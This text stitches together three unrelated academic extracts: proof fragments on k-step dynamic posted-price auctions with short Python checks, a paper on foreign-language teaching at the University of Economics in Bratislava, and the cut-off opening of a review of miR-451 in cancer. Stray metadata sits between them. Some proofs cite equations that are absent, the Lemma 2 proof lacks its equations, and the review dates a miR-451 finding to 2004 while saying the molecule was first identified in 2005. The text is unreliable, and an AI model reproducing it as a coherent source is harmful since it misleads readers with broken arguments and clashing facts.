To show part (i) of Proposition 1, it is enough to show that the mapping from any buyer's value to its equilibrium bid, denoted by b * (v), is monotone non-decreasing in v. This implies that b * (v) is a non-decreasing step function, and that the equilibrium can be identified by a sequence of weakly decreasing thresholds τ 1 ≥ τ 2 ≥ . . . τ k , as described in the statement of part (i) of Proposition 1.
Note that we only show b * (v) is a step function with k ′ ≤ k distinct steps, with step values being a strictly decreasing sub-sequence of p 1 > p 2 > . . . > p k . In principle, our price sequence might not be minimal, meaning that k ′ < k.
Fix the bidding strategies of all buyers in N except i. Consider values v_1 < v_2 for buyer i. Let b_1 = b*(v_1) and b_2 = b*(v_2). Moreover, let x_1 and x_2 be the allocation probabilities for buyer i given bids b_1 and b_2, respectively. First suppose buyer i's value is realized to be v_1. Because b_1 is her best-response bid under value v_1, we have:

x_1 (v_1 − b_1) ≥ x_2 (v_1 − b_2).

Now suppose buyer i's value is realized to be v_2. Because b_2 is her best-response bid under value v_2, we have:

x_2 (v_2 − b_2) ≥ x_1 (v_2 − b_1).

Summing up the above inequalities and rearranging the terms, we have:

(v_2 − v_1)(x_2 − x_1) ≥ 0.

Therefore, as v_1 < v_2, we should have x_1 ≤ x_2. Note that in k-DPA the allocation probability of buyer i as a function of her submitted bid is increasing. Therefore, b_1 ≤ b_2, as desired.
To show part (ii) of Proposition 1, we develop the indifference condition for buyers. To be more formal, suppose all buyers except buyer 1 play the BNE strategy b* from part (i). Now suppose buyer 1's value is v = τ_j + ǫ for small enough ǫ > 0. Then the expected utility of such a buyer when selecting price p_j should be no less than when selecting price p_{j+1}. Now suppose buyer 1's value is v = τ_j − ǫ for small enough ǫ > 0. Then the expected utility of such a buyer when selecting price p_{j+1} should be no less than when selecting price p_j. Taking the limit as ǫ → 0 indicates that the expected utility of a buyer with value τ_j should be the same under bidding either p_j or p_{j+1}. Now suppose round j with price p_j has arrived. If a buyer with value v accepts this price, her expected utility is the left-hand side of Eq. (3); the analogous expression for round j + 1 gives the right-hand side, and equating the two at v = τ_j yields the indifference condition.
Proof of Lemma 1
We can write P_n(x) = (1 − x^n)/(n(1 − x)) = (1/n) Σ_{j=0}^{n−1} x^j, which is increasing in x. The function 1 − x^n is decreasing in x. Making these two equal results in n(1 − x) = 1, i.e., x = 1 − 1/n. We now evaluate 1 − x^n (and therefore P_n(x)) at this point: 1 − (1 − 1/n)^n ≥ 1 − 1/e. This establishes min{1 − x^n, P_n(x)} ≥ 1 − 1/e for x = 1 − 1/n. However, x^n is not necessarily large at this point. We next show how we can choose another x that satisfies both criteria: taking x = 1/e^{1/n} gives x^n = 1/e, so 1 − x^n = 1 − 1/e, and P_n(x) = (1 − 1/e)/(n(1 − 1/e^{1/n})) ≥ 1 − 1/e, since n(1 − 1/e^{1/n}) ≤ 1. This completes the proof.
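A quick numeric check of the choice x = 1/e^{1/n} (with P_n(x) = (1 − x^n)/(n(1 − x)) as above):

```python
import math

# Check: x = 1/e^(1/n) gives x^n = 1/e while both 1 - x^n and P_n(x) stay
# above 1 - 1/e, where P_n(x) = (1 - x^n) / (n (1 - x)).
for n in (2, 10, 100):
    x = math.exp(-1.0 / n)
    Pn = (1 - x ** n) / (n * (1 - x))
    print(f"n = {n:3d}:  x^n = {x**n:.4f},  1 - x^n = {1 - x**n:.4f},  "
          f"P_n(x) = {Pn:.4f}  (1 - 1/e = {1 - 1/math.e:.4f})")
```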
By using Lemma 1 multiple times, and using the fact that τ + Σ_{i=1}^{n} E[(V_i − τ)^+] ≥ OPT for any τ, we can further bound (19).
Proof of Theorem 2
Given buyer values v_1, . . . , v_n ∼ G in the k-DPA problem, consider an instance of the batched prophet inequality problem with i.i.d. rewards V_i = φ_G(v_i). Define the randomized set Ñ = {i ∈ [n] : v_i ≥ φ_G^{-1}(0)}. Buyers in Ñ are the only buyers whose virtual value is non-negative; therefore, only they can contribute to the offline benchmark. Now fix a particular realization Ñ = S for some S ⊆ [n]. Note that conditioned on the event Ñ = S, as the V_i's are i.i.d., any V_i for i ∈ S is drawn from the same conditional CDF F̃ (the distribution of φ_G(v) conditioned on v ≥ ρ), where ρ = φ_G^{-1}(0). We now invoke Theorem 1 with rewards being |S| i.i.d. non-negative random variables drawn from distribution F̃(x) (with support [0, +∞)), in order to obtain k thresholds τ_1 > . . . > τ_k > 0. Based on the construction of these thresholds, we can write

F̃(τ_j) = 1/e^{j/n}, for j = 1, . . . , k,   (20)

and therefore we have: G(τ̃_j) = (1 − G(ρ))/e^{j/n} + G(ρ), for j = 1, . . . , k.
Note that the choice of these thresholds does not depend on the exact realization S. Now, by applying the competitive-ratio lower bound of Theorem 1 to this instance, we have E[ALG(τ_1, …, τ_k) | Ñ = S] ≥ (1 − 1/e^k) · E[max_{i∈S} V_i | Ñ = S].
By taking expectation over Ñ and applying the reduction in Section 2.4, we know that if (i) we set τ̃_j = φ_G^{-1}(τ_j) and use {τ̃_j}_{j∈[k]} as the equilibrium thresholds of a k-DPA against the original buyers, and then (ii) we use Proposition 2 and Equation (3) to obtain prices p supporting these equilibrium thresholds, then the k-DPA with prices p inherits the above guarantee. Moreover, the expected revenue of Myerson's optimal mechanism equals the expected maximum non-negative virtual value, and hence using prices p in k-DPA results in the desired approximation ratio. Finally, from Eq. (20) and the fact that τ̃_j = φ_G^{-1}(τ_j), we have G(τ̃_j) = (1 − G(ρ))α^j + G(ρ) for j = 1, …, k, where α = 1/e^{1/n}.
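As a concrete sanity check of this construction, consider the uniform case G = U[0, 1], where φ_G(v) = 2v − 1 and hence ρ = φ_G^{-1}(0) = 1/2; the closed form above then gives τ̃_j = 1/2 + e^{-j/n}/2. A minimal Python sketch (the function name and the uniform specialization are ours, for illustration only, not from the paper):

import math

def dpa_thresholds_uniform(n: int, k: int):
    """Equilibrium value thresholds for a k-DPA with n i.i.d. U[0,1] buyers,
    using G(tau_j) = (1 - G(rho)) * exp(-j/n) + G(rho) with G(x) = x, rho = 1/2."""
    rho = 0.5  # phi_G^{-1}(0) for U[0,1], since phi_G(v) = 2v - 1
    return [rho + (1 - rho) * math.exp(-j / n) for j in range(1, k + 1)]

print(dpa_thresholds_uniform(n=10, k=3))
# [0.952..., 0.909..., 0.870...]: strictly decreasing, as part (i) of Proposition 1 requires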
Proof of Proposition 3
The proof of this proposition is similar to that of Proposition 1. We next develop the indifference condition for buyers. If a buyer with value v accepts the price p_j in round j, her expected utility is

(v − p_j) Σ_{r=0}^{m} Σ_{ℓ=0}^{n−1−r} C(n−1, r) (1 − F(τ_{j−1}))^r C(n−1−r, ℓ) (F(τ_{j−1}) − F(τ_j))^ℓ F(τ_j)^{n−1−r−ℓ} · min{(m − r)/(ℓ + 1), 1},

where C(a, b) denotes the binomial coefficient, r counts the rival buyers who accepted in earlier rounds, and ℓ counts the rivals who accept simultaneously at round j. If she instead accepts the price p_{j+1} in round j + 1, her expected utility becomes

(v − p_{j+1}) Σ_{r=0}^{m} Σ_{ℓ=0}^{n−1−r} C(n−1, r) (1 − F(τ_j))^r C(n−1−r, ℓ) (F(τ_j) − F(τ_{j+1}))^ℓ F(τ_{j+1})^{n−1−r−ℓ} · min{(m − r)/(ℓ + 1), 1}.

The indifference condition then implies that the above two utilities are equal for v = τ_j, which leads to the equations in the statement of the proposition.
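To make the indifference equations concrete, the double sums can be evaluated numerically. Here is a minimal Python sketch, assuming the binomial form displayed above, with r rivals served in earlier rounds and ℓ rivals tying at the current round; the helper name and this combinatorial reading are illustrative assumptions, and the paper's exact expression may differ:

from math import comb

def round_utility(v, p_j, F_prev, F_cur, n, m):
    """Expected utility of accepting price p_j when each of the n-1 rivals
    independently has value above tau_{j-1} w.p. 1 - F_prev (accepted earlier),
    in (tau_j, tau_{j-1}] w.p. F_prev - F_cur (ties now), else below tau_j.
    Assumed form, for illustration only."""
    total = 0.0
    for r in range(0, m + 1):          # rivals served in earlier rounds
        for l in range(0, n - r):      # rivals tying at the current round (l <= n-1-r)
            prob = (comb(n - 1, r) * (1 - F_prev) ** r
                    * comb(n - 1 - r, l) * (F_prev - F_cur) ** l
                    * F_cur ** (n - 1 - r - l))
            total += prob * min((m - r) / (l + 1), 1.0)
    return (v - p_j) * total

# Indifference at v = tau_j would read:
# round_utility(tau_j, p_j,   F(tau_{j-1}), F(tau_j),   n, m)
#   == round_utility(tau_j, p_{j+1}, F(tau_j), F(tau_{j+1}), n, m)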
Proof of Lemma 2
We first establish that B(n, m, x) = m · A(n, m, x) / (n(1 − x)).
To see this, notice that (a) follows from Yan [2011, Lemma 4.2] together with the fact that the right-hand side is the limit as n → ∞, and (b) holds because the summation telescopes. This completes the proof.
"year": 2022,
"sha1": "e0547ca198688b9511fcaa9c9ff9ff115a1ac349",
"oa_license": null,
"oa_url": null,
"oa_status": null,
"pdf_src": "Arxiv",
"pdf_hash": "f4e083df26f8bde6ce0ca329cbf561f5a0acb1c5",
"s2fieldsofstudy": [
"Economics"
],
"extfieldsofstudy": [
"Computer Science",
"Economics"
]
} |
TEACHING FOREIGN LANGUAGES AT THE UNIVERSITY OF ECONOMICS IN BRATISLAVA IN CONNECTION TO THE NEEDS OF THE LABOUR MARKET
The objective of the authors of the article was to analyse the labour market from the point of view of the languages used by individual foreign companies in Slovakia. Since insufficient language competence of employees is one of the causes of youth unemployment in the European Union, the paper also focuses on the language preparation of students at the University of Economics in Bratislava, and considers whether the actual foreign language knowledge of graduates meets the requirements of the labour market, and whether the curricula of individual subjects reflect these requirements. English proved to be the most frequently selected foreign language among the students, followed by German. Since there are many American and British as well as German and Austrian companies located in Bratislava, we find this situation rather positive. However, we highly recommend that students acquire at least basic knowledge of German in order to increase their competitive advantage.
Introduction
The University of Economics in Bratislava (hereinafter referred to as "UEBA") belongs to the top-ranked providers of higher education in the Slovak Republic, with its history dating back to 1940. Throughout its existence, the structure and the name of the institution were amended several times, until the adoption of Act no. 292/1992 Coll., when the current name was adopted (Slov-Lex, 2017). Currently, it is composed of 7 faculties, 6 of them located in Bratislava (Faculty of National Economy, Faculty of Commerce, Faculty of Economic Informatics, Faculty of Business Management, Faculty of International Relations and Faculty of Applied Languages) and 1 with its premises located in Košice (Faculty of Business Economy). Since its foundation, more than 80 thousand students have successfully graduated from this institution. Approximately 12 thousand students are currently studying various economics-related disciplines at the UEBA (University of Economics in Bratislava, 2017).
Apart from knowledge of economics and related disciplines, each graduate of the UEBA is expected to possess communicative competence in at least two foreign languages, which is also in line with the intention of the European Union regarding the language competence of its citizens.
The main objective of this paper is to analyse the teaching of foreign languages at the University of Economics in Bratislava in connection to the language-related requirements of the labour market, predominantly from the point of view of foreign enterprises and their requirements regarding the language competence of their employees.
The primary research objective is to analyse whether foreign language teaching at the UEBA is sufficient to meet the requirements of the labour market, predominantly in Bratislava and the surrounding areas. We attempt to answer the question whether graduates of the UEBA possess language competence equivalent to the requirements of their potential employers. Based on the research results, possible improvement measures will be proposed whose implementation might help to cover potential gaps. Such measures may consist in increasing the number of teaching hours or seminars for the languages requiring more attention. The largest international companies in Bratislava will be discussed with regard to their corporate language. The result of this analysis will be confronted with the language learning opportunities for students of the UEBA. The research is based on the assumption that the creators of learning programmes at the UEBA take the situation and developments on the labour market into account when deciding on the content of study plans.
A fact is that unemployment of young people (youth unemployment usually refers to people aged 15-24 years) represents a serious problem for the European Union (Harakaľová, 2016, p. 164). This may be, among other reasons, due to foreign language competence that is insufficient to meet the requirements of the labour market.
Methodology
The present research is based on an analysis of the languages offered by the UEBA to students as part of the curricula, from a quantitative point of view. Concrete numerical data provided by the Faculty of Applied Languages, reflecting the numbers of students enrolled for particular foreign languages, is analysed. On these grounds, the languages are ranked according to the students' preferences. Data from the academic year 2013/2014 is used, since data from later academic years has not been processed; we therefore assume that the current state is very similar.
Next, the largest companies in Bratislava and the whole region are analysed. Special attention is paid predominantly to the companies' countries of origin, or the countries where the companies have their headquarters. Although English is generally required by almost every employer, we suppose that in each company the language of its home country is also necessary, at least for some job positions. For the purpose of the research, we consider the language of the country of origin to be the corporate language, which is likely to be required by the hiring managers. This helps us to evaluate which languages are most frequently sought in applicants.
Consequently, a comparison of the languages taught at the university with those required by employers will enable us to conclude whether foreign language teaching at the UEBA meets the needs of the labour market, or whether certain improvement measures could be proposed.
Foreign language competence in the European Union
With regard to European language policy, one of the primary objectives of the European Union is to strengthen the language competence of its citizens. More exactly, every citizen of an EU member state is supposed to master at least 2 foreign languages. This should be achieved by means of language learning, which is funded by various programmes and projects. The reason behind the EU's interest in supporting language learning is the idea of languages being a significant part of European identity as well as an explicit expression of a culture. Linguistic diversity in Europe is therefore considered to be a key phenomenon. Furthermore, language competence is thought to be one of the skills improving opportunities on the labour market (European Parliament, 2016).
The idea of mastering at least 2 foreign languages emerged in 2002. The report points to the need "to improve the mastery of basic skills, in particular by teaching at least two foreign languages from a very early age: establishment of a linguistic competence indicator in 2003..." (Barcelona European Council, 2002, p. 19).
According to the Statistical Office of the European Union, foreign language competence among EU citizens, citizens of Slovakia, and citizens of its neighbouring countries (apart from Ukraine, which as a non-member state was not included in the research) aged 25-64 in 2011 was as demonstrated in Figure 1 (%) (Eurostat, 2015).
Figure 1. Foreign language competence in chosen EU countries (Source: Own processing according to Eurostat)
It is important to mention that foreign language competence is considered a success factor in the international workplace. In Bratislava, which is not only the capital of Slovakia but also a political, economic, and business centre of the Republic and one of the richest regions in the European Union, with a variety of multinational corporations, the ability to communicate in a foreign language is a necessity. Comparing the situation in Slovakia in 2011, when 14.70% of people claimed not to speak any foreign language, with its neighbouring countries, the outcome is a relatively positive finding in favour of Slovakia. Furthermore, this figure was deeply below the EU-28 average, which amounted to 34.30%. Besides that, the data indicate an interesting trend, as 21.60% of Slovaks reported knowing 3 or more languages, which also differs significantly from the EU-28 average (8.80%) (Figure 1).
For the purpose of this paper, we suppose that foreign language competence of the young generation (up to the age of 24) might be on a very similar level.
Youth unemployment as a negative trend in Europe
As already mentioned, unemployment of the young generation represents a crucial problem in the European Union, especially in Spain, Greece, Croatia, Italy, Portugal, and Cyprus. The youth unemployment rate has been declining since 2013, although not in every country. Despite the decline in unemployment of young people, the rate remains at a high level. One of the consequences of this development is a significant difference among countries (Harakaľová, 2016, p. 165).
In the context of the major European Union proposals, the strategy "Europe 2020" and its initiative "Youth on the move" should be mentioned, since the latter concerns the education and employment of young people. The objective of tackling unemployment of the young generation is closely linked to the more general aim of the European Union of achieving a 75% employment rate in the working population (persons aged 20-64 years) (Harakaľová, Lipková, Grešš, 2015, p. 320). In addition, not only unemployment but also social exclusion is a problem the European Union needs to face and is aware of (Šoltés, Šoltésová, Hrivíková, 2016, p. 1692).
Despite the fact that the youth unemployment rate in Slovakia is still at a relatively high level, we can see a positive trend in the declining numerical data. In 2013, the youth unemployment rate in Slovakia constituted 33.70%; in 2014, it was reduced to 29.70% and kept declining; in 2015, it was already 26.50% (Eurostat, 2017). Over the course of 2016 alone, the youth unemployment rate in Slovakia fell from 24.8% in January to 20.4% in December, a drop of approximately 4.4 percentage points (Trading Economics / Eurostat, 2017). According to the Trading Economics forecast (last updated on 24 February 2017), the youth unemployment rate in Slovakia will continue to decline, reaching 17.58% in 2020.
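The 4.4-point drop quoted above is a difference in percentage points rather than a relative change; a two-line check makes the distinction explicit:

jan, dec = 24.8, 20.4           # Slovak youth unemployment in 2016 (%)
print(jan - dec)                # 4.4 percentage points
print((jan - dec) / jan * 100)  # ~17.7% relative decline over the year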
The development at the EU-wide level differs from the Slovak trend. Throughout 2016, the figure fluctuated between 18.5% and 19.3% (Trading Economics / Eurostat, 2017). The difference between the youth unemployment rates at the beginning and the end of the year was thus less significant than in Slovakia. Although the youth unemployment rate in the European Union as a whole was not only declining but at times increasing or stagnating, the nominal rate was lower than that in Slovakia (Figure 2). The analysed data proves that unemployment of the young generation is a problem that needs to be dealt with. Youth unemployment may in some cases result in long-term unemployment (Bugárová, 2016, p. 22). When talking specifically about the unemployment of graduates, Slovakia belongs to the EU countries with the highest share of unemployed graduates (Bugárová, 2016, p. 28). One reason for this trend may be, apart from other factors, insufficient foreign language competence. The chance to succeed on the labour market can then be relatively low. We therefore agree with the objective of the European Union and believe it is necessary to acquire foreign language competence corresponding to the needs of the labour market. Without language skills, it may nowadays be a serious problem to find employment meeting one's needs and requirements.
Language skills can be considered a component of one's qualification. The research by Lučkaničová, Ondrušeková and Rešovský (2012) depicts a marked trend for employers in Slovakia to prefer educated young people with prospects, while at the same time requiring a high level of qualification and relevant experience (p. 35).
Moreover, young people's preferences regarding their potential employer have also been undergoing changes. Grencikova, Spankova and Karbach (2015) describe this tendency as follows: "Young people do not want to have a fixed, single career, instead, they are going to work for multiple employers and be independent" (p. 294).
Foreign languages taught at the University of Economics in Bratislava
Although most of the students attending the UEBA are Slovak citizens with Slovak as their mother tongue, and the majority of the learning programmes taught at the UEBA are conducted in Slovak, there are also programmes offered in a foreign language, such as International Financial Management (Internationales Finanzmanagement) in German, Sales Management (Managment de la Vente) in French, and General Management and International Finance in English. Apart from that, there is also a learning programme in Foreign Languages and Intercultural Communication at the Faculty of Applied Languages, taught in English or German (University of Economics in Bratislava, 2017). As far as the structure of Slovak learning programmes is concerned, each of them also contains a foreign language unit.
Students of the UEBA can choose one of the following foreign languages: English, German, Spanish, French, Russian, and Italian, and even Slovak for those with a different mother tongue. If needed, a Chinese or Arabic language class can be opened. In the academic year 2013/2014, the share of languages based on the number of students was as shown in Table 1 (the abbreviation FT stands for full-time, PT for part-time). It is obvious that English has the highest representation among students, followed by German. The third most taught foreign language was Spanish, followed by French, Russian, and Italian. The lowest number of students chose Slovak as a foreign language; those are mostly exchange students.
Taking exclusively the active students into account, the percentages for the individual languages would be as follows: 34.71% of full-time students and 45.88% of part-time students learnt English in the summer semester of the academic year 2013/2014. During the same semester, 29.12% of full-time and 36.47% of part-time students chose German as a foreign language. In the winter semester, the numbers were slightly different: 48.18% of full-time and 59.59% of part-time students attended an English course, while 21.12% of full-time and 29.50% of part-time students attended a German language course. The representation of other languages was much less significant.
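The shares quoted above are simple ratios of a language's active learners to all active students in the given semester. A minimal Python sketch with hypothetical counts, chosen only to reproduce the summer full-time figures (the real counts are those in Table 1):

# Hypothetical active full-time student counts per language (illustrative only)
active_ft_summer = {"English": 590, "German": 495, "Spanish": 180,
                    "French": 130, "Russian": 190, "Italian": 115}
total = sum(active_ft_summer.values())
for language, count in active_ft_summer.items():
    print(f"{language}: {count / total:.2%}")
# English -> 34.71%, German -> 29.12%, matching the percentages above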
As far as the following academic years are concerned, we suppose that very similar data would have been obtained in the academic years 2014/2015 and 2015/2016 and in the current one. However, the exact numerical data is not at our disposal because it has not been processed. The data presented above will thus be considered to mirror the current situation as well.
The largest companies in Bratislava as potential employers of the UEBA graduates
We assume that English is most likely to be required in recruitment processes of international corporations in Bratislava. In the following part, the largest companies in the Bratislava region will be confronted with their corporate languages. In this context, we consider a corporate language to be the language of the country where the company has its headquarters, or the country of origin. For the purpose of this paper, these corporations are viewed as potential employers. Our analysis is based on data from 2015, because relevant data from 2016 had not been published yet. The main criteria of the companies' ranking are their revenue and the region (Bratislava). The data in Table 2 come from the database of financial data (FinStat, 2017); the table lists each company's industry, ownership, and country of origin (Source: Own processing according to the website of the financial data database). When analysing the largest companies in the Bratislava region, we need to mention that, besides foreign companies, several Slovak state-owned enterprises belong to those with the highest revenue. British and American corporations also play a very important role. Among others, German companies hold an important position on the market as well. It is to be mentioned that these companies not only demonstrate the highest revenues but also employ the largest numbers of workers in Slovakia. Therefore, as already mentioned, they are likely to become employers of graduates of the UEBA.
Although German is already the second most often studied foreign language at the UEBA, we would still highly recommend that students acquire at least basic knowledge of this language, since the number of German and Austrian companies in the region indicates a need to be able to communicate in German. Due to the presence of not only German but also Austrian firms in Bratislava and the surrounding areas, it is a great advantage to be capable of active communication in German. Knowledge of the German language may considerably increase one's chances on the labour market; in combination with English, it is virtually a success factor.
Adamcová sums up the reasons for learning and using German in Slovakia as follows: Germany, Austria, and Switzerland are the most important business partners of Slovakia, and media from German-speaking countries are popular here as well. Besides that, intercultural encounters between Slovakia and Germany have been occurring for a very long period of time; therefore, it is not possible to imagine Slovak history without a German presence (Adamcová, 2010, p. 41). We can also mention the geographical aspect, i.e. the proximity of Slovakia to the German-speaking countries in question.
We find it necessary to mention that the UEBA has entered into bilateral agreements with dozens of foreign universities and providers of higher education (e.g. within the Erasmus+ programme). The students may therefore choose from a variety of institutions from all around Europe and thus improve their language competence.
Conclusion
The main intention of this paper was to analyse the foreign languages taught at the University of Economics in Bratislava in view of labour market requirements. The primary research question was whether the teaching of foreign languages at this institution is efficient enough to prepare its students for a professional career, i.e. whether a graduate possesses the language competences required by companies operating on the labour market in the region.
One of the main findings of our study was the dominance of English as a taught subject at the UEBA; such a result was presupposed even prior to the analysis. The second most frequently chosen foreign language was German, followed by Spanish and French. Next, we elaborated a list of the largest companies in Bratislava with regard to their revenues. Some of them are owned by the state, and some of them also belong to the largest companies as far as the number of employees is concerned.
Of the listed companies, approximately every third one is a German or an Austrian corporation. We suppose that English is required by most of the companies in the ranking, or depending on the vacancy. Since it was shown that German and Austrian companies also belong to the most significant ones, we would recommend that students attempt to acquire at least basic knowledge of German, besides other languages, as in Bratislava and the whole region it might be a real advantage. One way to do so is to apply for a mobility programme abroad, since the UEBA offers its students a number of opportunities to study in a foreign country. Many of them are under the auspices of the European Union, whose target is to support the foreign language competence of its citizens.
On the other hand, the finding that German is the second most frequently taught language at the UEBA corresponds to the number of companies from German-speaking countries doing business in Bratislava. Therefore, we may conclude that the University takes the developments and trends on the labour market into consideration when elaborating the study curricula. Besides that, students are also likely to be aware of the added value which the German language brings.
The same methodology might also be used in the future to analyse foreign language competence and labour market requirements in other regions, or to analyse foreign language teaching at other universities and providers of higher education. We believe that the situation on the labour market regarding required languages should always be taken into consideration by those preparing study plans at various universities.
Figure 2. Development of youth unemployment in Slovakia and the EU in 2016 (Source: Own processing according to Trading Economics / Eurostat)
Table 1. Foreign languages taught at the University of Economics in Bratislava in the academic year 2013/2014 and the respective numbers of students (for the summer and winter semesters of 2013/2014: full-time (FT) enrolled, FT active, part-time (PT) enrolled, and PT active)
Data provided by the Faculty of Applied Languages
"year": 2017,
"sha1": "972a9b26949bf0018c6d0a77a17fdfc01fdc8621",
"oa_license": "CCBY",
"oa_url": "http://ae.fl.kpi.ua/article/download/94528/114218",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "972a9b26949bf0018c6d0a77a17fdfc01fdc8621",
"s2fieldsofstudy": [
"Linguistics",
"Education"
],
"extfieldsofstudy": [
"Political Science"
]
} |
miR-451: A Novel Biomarker and Potential Therapeutic Target for Cancer
Abstract MicroRNAs (miRNAs) are endogenous, non-coding, single-stranded small RNAs involved in a variety of cellular processes, including ontogeny, cell proliferation, differentiation, and apoptosis. They can also function as oncogenes or tumor suppressor genes. Recent studies have revealed that miRNA-451 (miR-451) is involved in the regulation of various human physiological and pathological processes. Furthermore, it has been shown that miR-451 not only directly affects the biological functions of tumor cells but also indirectly affects tumor cell invasion and metastasis upon secretion into the tumor microenvironment via exosomes. Thus, miR-451 also influences the progression of tumorigenesis and drug resistance. This review summarizes the expression of miR-451 in various cancer types and the relationship between miR-451 and the diagnosis, treatment, and drug resistance of solid tumors. In addition, we address possible mechanisms of action of miR-451 and its potential application as a biomarker in the diagnosis and treatment of human cancers.
Introduction
Although great progress has been made in cancer treatments over the past several years, 1,2 the overall survival rates for some types of cancers are still very low owing to metastasis, recurrence, and drug resistance. Therefore, the identification of diagnostic molecular biomarkers for early cancer detection and the development of targeted treatments are crucial.
Increasing evidence has confirmed that noncoding RNAs (ncRNAs) participate in both physiological and pathological processes, including cell development, differentiation, proliferation, and apoptosis. MicroRNAs (miRNAs or miRs), a subtype of ncRNAs, are a class of small, endogenous, highly conserved, single-stranded noncoding RNAs of approximately 22 nucleotides. 3 They may function as oncogenes or tumor suppressor genes, depending on the cancer type and physiological environment. 4,5 More than 2500 mature miRNAs have been identified in the human genome and recorded in the public miRBase database. Among these, more than 1000 regulate over 50% of protein-coding human genes, and each miRNA can control up to 100 gene transcripts. A single miRNA may regulate gene expression at both the transcriptional and posttranscriptional levels by binding to the 3′ untranslated region of hundreds of target messenger RNAs (mRNAs). 6 The identification of downstream target mRNAs is a major focus of miRNA research. Epigenetic and genetic alterations of miRNAs are common events in cancer progression. Therefore, miRNAs have significant promise as diagnostic, prognostic, and therapeutic cancer biomarkers. [7][8][9][10] miR-451 was first identified in the human pituitary gland in 2005 by Altuvia et al 11 The gene encoding this miRNA is located in human chromosomal region 17qll.2. miR-451 participates in multiple physiological and pathological processes, including hematopoietic system differentiation, 12 embryonic development, epithelial cell polarity, 13, and nervous system development. 14 It is dysregulated in multiple cancers and participates in numerous cancer-related biological processes, including proliferation, apoptosis, angiogenesis, epithelial-mesenchymal transition (EMT), drug resistance, and metastasis. It often acts as a tumor suppressor gene in cancers and modulates multiple pathways by targeting different downstream mRNAs.
In this review, we focus on the function of miR-451 in multiple cancer types and its underlying mechanisms. More importantly, we will discuss the potential of miR-451 as a biomarker for early cancer diagnosis and as a therapeutic candidate for the treatment of metastatic or recurrent cancer and to overcome drug resistance.
miR-451 Function by Cancer Type
In recent years, researchers have begun to employ genechip and second-generation sequencing technologies to detect the expression of miR-451 in patient-derived tumor tissues and body fluids and cancer cell lines, which revealed that miR-451 expression differs between cancers as well as sample types (eg, blood, saliva, or urine). miR-451 acts as a tumor suppressor gene in most cancer types, whereas in appendiceal mucinous cystadenocarcinoma 15 and pancreatic cancer, 16,17 it acts as an oncogene.
miR-451 and Lung Cancers
Lung cancer is the most common cancer type and the leading cause of cancer mortality worldwide, accounting for 12% of the total cancer cases and 18% of the total cancer deaths in 2018. 18 Lung cancers are classified as small-cell lung carcinoma (SCLC) or non-small-cell lung carcinoma (NSCLC), which accounts for approximately 85% of all lung cancers. In 2011, Wang et al 19 reported that miR-451 was the most strongly downregulated miRNA in 23 matched normal and NSCLC tumor tissues and that low miR-451 expression was correlated with poor tumor differentiation, advanced pathological stage, lymph-node (LN) metastasis, and shorter overall survival. Overexpression of miR-451 by transfection with a miR-451 mimic triggered apoptosis and inhibited proliferation in NSCLC cell lines by directly targeting RAB14, a member of the RAS oncogene family of small GTPases. Mechanistically, miR-451 was reported to suppress cell proliferation and metastasis by targeting the inflammatory factors PSMB8/NOS2 in A549 cells. 20 Other investigators have verified these results in additional lung cancer tissues. 21,22 The link between low miR-451 expression and poor prognosis for NSCLC has been investigated by Goto et al,22 who found that renewed expression of miR-451 led to suppression of macrophage migration inhibitory factor (MIF) and phosphorylated Akt expression, as well as cell proliferation and migration in NSCLC cell lines. In addition, miR-451 was found to selectively promote sensitivity to cisplatin in ERCC1-high NSCLC cells by targeting the Wnt/βcatenin and PI3K/AKT pathways. 23 These results support the role of miR-451 as a tumor suppressor in lung cancer.
miR-451 and Digestive System Cancers
Hepatocellular carcinoma (HCC) is the most common aggressive carcinoma of the liver and the third-ranking contributor to tumor-associated death worldwide. 24 Li et al 25 found that miR-451 was markedly downregulated in HCC cells and tissues and functions as a tumor suppressor in HCC. They further verified that IKK-β is an important mediator of NF-κB activation in response to miR-451 inhibition in HCC. Global microarray-based miRNA expression profiling of 12 pairs of matched HCC and non-HCC tissues revealed that miR-451 is involved in hepatitis B virus-unrelated HCC. 26 Downregulation of miR-451 in HCC tissues is significantly correlated with advanced clinical stage, metastasis, and reduced disease-free and overall survival. 27 The same study revealed that activation of Erk1/2 signaling can mediate miR-451/c-Myc-induced EMT and metastasis in HCC cells by regulating the expression of EMT-related and MMP family proteins. In 2004, it was discovered that miR-451 can inhibit the migratory ability of hepatoma cell lines by targeting ATF2. 28 Furthermore, miR-451 is downregulated in multiple HCC cell lines and negatively regulates cell growth and invasion in a caspase-3- and MMP-9-dependent manner. Liu et al 29 further showed that miR-451 may act as a tumor suppressor in HCC by antagonizing angiogenesis through directly targeting the IL-6R-STAT3-VEGF pathway.
Colorectal cancer (CRC) is the third most common type of cancer worldwide. 30 Xu et al 31 evaluated 20 CRC tumor and adjacent non-cancerous tissues by microarray analysis. They found that miR-145, miR-451, and miR-1 were significantly downregulated in the tumor tissues. Another group found that miR-451 expression was downregulated in CRC tissues and was negatively correlated with the Dukes stage. 32 In-vitro and in-vivo studies revealed that miR-451 may inhibit colon cancer growth by directly targeting Ywhaz and indirectly regulating nuclear FoxO3 accumulation. 32 In 2013, Li and colleagues reported that miR-451 inhibits CRC cell growth by downregulating the PI3K/AKT pathway. 33 Others discovered that miR-451 suppresses cell growth by downregulating the expression of its target gene IL6R in the CRC cell line RKO. 34 In 2017, Mamoori et al 35 analyzed 70 matched cancerous and non-cancerous fresh-frozen tissues of patients with CRC (35 men and 35 women) who underwent resection of colorectal adenocarcinoma. They noticed that miR-451 was downregulated in the majority of the CRC tissues. Downregulation of miR-451 correlated significantly with the presence of coexisting adenoma and cancer persistence or recurrence after surgery. The authors further confirmed that miR-451 has a tumor-suppressing role in CRC by targeting MIF.
Gastric cancer (GC) is the second most frequently diagnosed cancer in the world, particularly in eastern Asia. 36 As early-stage GC is difficult to detect, patients often are in an advanced stage of the disease at diagnosis. The recurrence rate in patients with highly aggressive cancer subtypes at an advanced stage is as high as 70%, even after successful complete resection. Su et al 37 studied 107 paired human primary gastric tumor and adjacent normal tissues and GC cell lines. They reported low miR-451 expression in the GC tissues and cell lines and that downregulation of miR-451 tended to be positively correlated with lymphatic metastasis, TNM stage, advanced clinical stage, and shorter overall survival in patients with GC. Shen et al 38 confirmed that miR-451 is positively correlated with tumor stage, lymphatic metastasis, and shorter overall survival in patients with GC and suggested downregulation of miR-451 as a diagnostic and prognostic biomarker in GC. Similar results have also been reported based on the investigation of tumor tissues and the clinicopathological features of 180 patients with GC. 37,39

